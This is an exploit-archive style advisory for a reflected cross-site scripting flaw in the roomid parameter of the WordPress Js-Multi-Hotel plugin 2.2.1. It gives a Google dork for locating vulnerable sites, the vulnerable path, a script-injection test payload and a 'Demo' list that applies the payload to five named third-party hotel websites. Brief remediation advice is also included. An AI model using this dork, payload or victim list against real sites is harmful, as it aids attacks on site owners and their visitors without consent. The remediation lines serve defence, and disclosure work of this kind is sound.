#######################################################################
# Exploit Title : WordPress Js-Multi-Hotel Plugin Cross-Site Scripting (XSS)
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork : inurl:wp-content//plugins/js-multihotel/
#
# Date: 2013-11-30
#
# Vendor Homepage : http://wordpress.org
#
# Plugin Name : Js Multi Hotel
#
# Version : 2.2.1
#
# Tested on: Windows , Linux
#
##############
# Exploit : Reflected cross-site scripting (XSS) via the roomid parameter
#
# Location:
wp-content//plugins/js-multihotel/includes/refreshDate.php?d=&roomid=[xss]
#
# Method : GET
#
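# Script For Test : "/><script>alert(1);</script>
#
# Note : The test string closes a quoted attribute and its tag, which suggests roomid is written into the response without output encoding (inferred from the payload; the plugin source is not shown here).
# Remediation : Validate roomid as an integer and HTML-encode it on output (e.g. htmlspecialchars() with ENT_QUOTES); until a fixed version is installed, block direct requests to includes/refreshDate.php.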
#
##############
##############
# Demo:
#
#
http://addocreations.com/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
#
#
http://broadwaysbnb.com/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
#
#
http://hotelpachelly.com/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
#
#
http://rajasthan-hotels.in/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
#
#
http://palenque.piedradeagua.com/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=&roomid=
"/><script>alert(1);</script>
##############
#
# Discovered By : ACC3SS
#
##############